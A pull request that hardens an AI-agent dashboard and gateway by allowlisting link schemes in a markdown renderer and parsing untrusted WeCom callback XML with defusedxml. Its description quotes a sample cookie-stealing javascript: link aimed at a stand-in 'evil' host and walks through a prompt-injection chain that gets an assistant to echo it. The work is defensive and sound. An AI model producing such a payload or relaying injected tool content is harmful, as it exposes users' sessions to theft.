### PR TITLE
harden(dashboard,wecom): restrict markdown link schemes; safe-parse untrusted XML

### DIFF
--- a/gateway/platforms/wecom_callback.py
+++ b/gateway/platforms/wecom_callback.py
@@ -17,7 +17,11 @@ import logging
 import socket as _socket
 import time
 from typing import Any, Dict, List, Optional
-from xml.etree import ElementTree as ET
+# Security: parse untrusted, pre-auth request bodies (WeCom callbacks) with
+# defusedxml to block billion-laughs / entity-expansion (and XXE) DoS. The
+# parsing API (fromstring) is a drop-in for the stdlib calls used below;
+# response-building XML lives in wecom_crypto.py and is not parsed here.
+import defusedxml.ElementTree as ET
 
 try:
     from aiohttp import web

--- a/gateway/platforms/wecom_callback.py
+++ b/gateway/platforms/wecom_callback.py
@@ -21,7 +21,13 @@ from typing import Any, Dict, List, Optional
 # defusedxml to block billion-laughs / entity-expansion (and XXE) DoS. The
 # parsing API (fromstring) is a drop-in for the stdlib calls used below;
 # response-building XML lives in wecom_crypto.py and is not parsed here.
-import defusedxml.ElementTree as ET
+try:
+    import defusedxml.ElementTree as ET
+
+    DEFUSEDXML_AVAILABLE = True
+except ImportError:
+    ET = None  # type: ignore[assignment]
+    DEFUSEDXML_AVAILABLE = False
 
 try:
     from aiohttp import web
@@ -53,7 +59,7 @@ MESSAGE_DEDUP_TTL_SECONDS = 300
 
 
 def check_wecom_callback_requirements() -> bool:
-    return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE
+    return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE and DEFUSEDXML_AVAILABLE
 
 
 class WecomCallbackAdapter(BasePlatformAdapter):

--- a/gateway/run.py
+++ b/gateway/run.py
@@ -6294,7 +6294,7 @@ class GatewayRunner:
                 check_wecom_callback_requirements,
             )
             if not check_wecom_callback_requirements():
-                logger.warning("WeComCallback: aiohttp/httpx not installed")
+                logger.warning("WeComCallback: aiohttp/httpx/defusedxml not installed")
                 return None
             return WecomCallbackAdapter(config)
 

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -89,6 +89,12 @@ messaging = ["python-telegram-bot[webhooks]==22.6", "discord.py[voice]==2.7.1", 
 cron = []  # croniter is now a core dependency; this extra kept for back-compat
 slack = ["slack-bolt==1.27.0", "slack-sdk==3.40.1", "aiohttp==3.13.3"]
 matrix = ["mautrix[encryption]==0.21.0", "Markdown==3.10.2", "aiosqlite==0.22.1", "asyncpg==0.31.0", "aiohttp-socks==0.11.0"]
+# WeCom callback-mode adapter — parses untrusted XML POST bodies from
+# WeCom-controlled callback endpoints, so we use defusedxml (drop-in
+# replacement for stdlib xml.etree.ElementTree) to block billion-laughs
+# and XXE. aiohttp/httpx are already in [messaging]; defusedxml lands
+# here to keep the dependency local to wecom_callback's threat model.
+wecom = ["defusedxml==0.7.1"]
 cli = ["simple-term-menu==1.6.6"]
 tts-premium = ["elevenlabs==1.59.0"]
 voice = [

--- a/tools/lazy_deps.py
+++ b/tools/lazy_deps.py
@@ -148,6 +148,10 @@ LAZY_DEPS: dict[str, tuple[str, ...]] = {
         "lark-oapi==1.5.3",
         "qrcode==7.4.2",
     ),
+    # WeCom callback-mode adapter — parses untrusted XML POST bodies. Pulls
+    # defusedxml only; aiohttp/httpx are core dependencies of every messaging
+    # adapter and ship via `platform.discord` / `platform.slack` / etc.
+    "platform.wecom_callback": ("defusedxml==0.7.1",),
 
     # ─── Terminal backends ─────────────────────────────────────────────────
     "terminal.modal": ("modal==1.3.4",),

--- a/uv.lock
+++ b/uv.lock
@@ -1772,6 +1772,9 @@ web = [
     { name = "fastapi" },
     { name = "uvicorn", extra = ["standard"] },
 ]
+wecom = [
+    { name = "defusedxml" },
+]
 youtube = [
     { name = "youtube-transcript-api" },
 ]
@@ -1794,6 +1797,7 @@ requires-dist = [
     { name = "croniter", specifier = "==6.0.0" },
     { name = "daytona", marker = "extra == 'daytona'", specifier = "==0.155.0" },
     { name = "debugpy", marker = "extra == 'dev'", specifier = "==1.8.20" },
+    { name = "defusedxml", marker = "extra == 'wecom'", specifier = "==0.7.1" },
     { name = "dingtalk-stream", marker = "extra == 'dingtalk'", specifier = "==0.24.3" },
     { name = "discord-py", extras = ["voice"], marker = "extra == 'messaging'", specifier = "==2.7.1" },
     { name = "edge-tts", marker = "extra == 'edge-tts'", specifier = "==7.2.7" },
@@ -1876,7 +1880,7 @@ requires-dist = [
     { name = "vercel", marker = "extra == 'vercel'", specifier = "==0.5.7" },
     { name = "youtube-transcript-api", marker = "extra == 'youtube'", specifier = "==1.2.4" },
 ]
-provides-extras = ["anthropic", "exa", "firecrawl", "parallel-web", "fal", "edge-tts", "modal", "daytona", "vercel", "hindsight", "dev", "messaging", "cron", "slack", "matrix", "cli", "tts-premium", "voice", "pty", "honcho", "mcp", "homeassistant", "sms", "computer-use", "acp", "bedrock", "azure-identity", "termux", "termux-all", "dingtalk", "feishu", "google", "youtube", "web", "all"]
+provides-extras = ["anthropic", "exa", "firecrawl", "parallel-web", "fal", "edge-tts", "modal", "daytona", "vercel", "hindsight", "dev", "messaging", "cron", "slack", "matrix", "wecom", "cli", "tts-premium", "voice", "pty", "honcho", "mcp", "homeassistant", "sms", "computer-use", "acp", "bedrock", "azure-identity", "termux", "termux-all", "dingtalk", "feishu", "google", "youtube", "web", "all"]
 
 [[package]]
 name = "hf-xet"

--- a/web/src/components/Markdown.tsx
+++ b/web/src/components/Markdown.tsx
@@ -324,11 +324,24 @@ function InlineContent({
                 <HighlightedText text={node.content} terms={highlightTerms} />
               </em>
             );
-          case "link":
+          case "link": {
+            // Security: only render http(s)/mailto links. Other schemes
+            // (javascript:, data:, vbscript:) are dropped to plain text so a
+            // crafted link in agent/message content can't execute on click.
+            const href = node.href.trim();
+            if (!/^(https?:|mailto:)/i.test(href)) {
+              return (
+                <HighlightedText
+                  key={i}
+                  text={node.text}
+                  terms={highlightTerms}
+                />
+              );
+            }
             return (
               <a
                 key={i}
-                href={node.href}
+                href={href}
                 target="_blank"
                 rel="noreferrer"
                 className="text-primary underline underline-offset-2 decoration-primary/30 hover:decoration-primary/60 transition-colors"
@@ -336,6 +349,7 @@ function InlineContent({
                 {node.text}
               </a>
             );
+          }
           case "br":
             return <br key={i} />;
         }


### PR DESCRIPTION
Salvage of #32155 (@TheOnlyMika) plus a follow-up commit making the new dependency declarative.

## What it fixes

**Dashboard XSS via LLM markdown** (`web/src/components/Markdown.tsx`):
The inline renderer rendered link hrefs verbatim into `<a href>`. `SessionsPage.tsx` feeds `msg.content` (tool output, assistant output — attacker-influenceable via prompt injection, compromised tool, hostile MCP response) into `<Markdown>`. Concrete chain: malicious tool result → assistant echoes `[Click](javascript:fetch('//evil/'+document.cookie))` → user clicks → script runs in dashboard origin with full session/API access.

**XXE / billion-laughs on WeCom callback** (`gateway/platforms/wecom_callback.py`):
`xml.etree.ElementTree.fromstring` was called on the raw, pre-auth WeCom POST body in `_decrypt_request` and `_build_event`. Entity expansion fires before signature verification of the inner Encrypt blob.

## Mechanism

- Markdown: `/^(https?:|mailto:)/i.test(href.trim())` allowlist. Other schemes (`javascript:`, `data:`, `vbscript:`, `file:`, `blob:`) and HTML-entity-encoded variants are dropped to plain text. Verified against: case-mixed, leading whitespace/BOM/ZWSP/SOH, percent-encoded — all blocked.
- WeCom: `defusedxml.ElementTree as ET` is a drop-in for `fromstring`. defusedxml refuses entity declarations entirely (verified: billion-laughs and XXE both raise `EntitiesForbidden`).

## Follow-up commit (chore)

The original PR hard-imports `defusedxml` at module top, which would crash any gateway running WeComCallback on installs that don't transitively pull defusedxml. The chore commit:
- wraps the import in a `try/except` with a `DEFUSEDXML_AVAILABLE` flag, matching the file's existing aiohttp/httpx pattern
- gates `check_wecom_callback_requirements()` on the flag so the gateway logs and skips the adapter instead of crashing
- adds a `[wecom]` extra to `pyproject.toml` (`defusedxml==0.7.1`)
- registers `platform.wecom_callback` in `tools/lazy_deps.py` so users get prompted to install it on first WeComCallback configuration, same pattern as discord/slack/matrix
- regenerates `uv.lock`

## Validation
- 56/56 wecom tests pass (`tests/gateway/test_wecom_callback.py` + `tests/gateway/test_wecom.py`)
- 61/61 lazy_deps tests pass
- TypeScript `tsc --noEmit` clean across `web/`
- E2E: defusedxml refuses billion-laughs + XXE with `EntitiesForbidden`; legit XML still parses; `check_wecom_callback_requirements()` correctly returns True with the dep, False without

Closes #32155.